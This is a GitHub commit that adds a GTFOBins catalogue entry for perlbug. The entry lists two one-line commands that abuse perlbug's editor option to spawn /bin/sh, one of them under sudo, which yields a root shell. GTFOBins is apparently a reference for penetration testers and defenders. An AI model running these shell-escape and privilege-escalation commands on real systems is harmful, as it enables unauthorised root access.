Add perlbug

This commit is contained in:
Andrea Cardaci
2022-12-16 13:57:14 +01:00
committed by GitHub

7
_gtfobins/perlbug.md Normal file
View File

@@ -0,0 +1,7 @@
---
functions:
shell:
- code: perlbug -s 'x x x' -r x -c x -e 'exec /bin/sh;'
sudo:
- code: sudo perlbug -s 'x x x' -r x -c x -e 'exec /bin/sh;'
---